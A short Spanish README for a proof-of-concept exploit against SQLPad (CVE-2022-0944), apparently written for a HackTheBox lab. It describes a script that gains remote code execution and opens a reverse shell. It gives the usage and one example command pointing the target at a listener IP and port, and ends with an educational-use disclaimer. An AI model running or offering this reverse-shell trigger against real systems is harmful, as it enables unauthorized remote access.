
Prueba de concepto de explotación para SQLPad RCE (CVE-2022-0944) que activa una shell inversa hacia la máquina del atacante, destinada a pruebas de seguridad autorizadas y fines educativos.
Exploit de prueba de concepto para SQLPad RCE (CVE-2022-0944) que conduce a un RCE con una revershell a la PC del atacante.
usage: script.py URL IP PORT
positional arguments:
URL URL a SQLPad
IP Dirección del host del listener para la shell inversa
PORT Puerto del listener para la shell inversa
Ejemplo:
# trigger exploit
./script.py http://admin.sightless.htb 10.10.11.2 443
Este repositorio contiene herramientas que están destinadas únicamente a fines educativos, específicamente para su uso en entornos de aprendizaje de ciberseguridad. El autor de este código no asume ninguna responsabilidad por las consecuencias derivadas del uso, mal uso o modificación de este código. El código se proporciona "tal cual" sin ninguna garantía, ya sea expresa o implícita, incluidas, entre otras, las garantías implícitas de comerciabilidad o idoneidad para un propósito particular.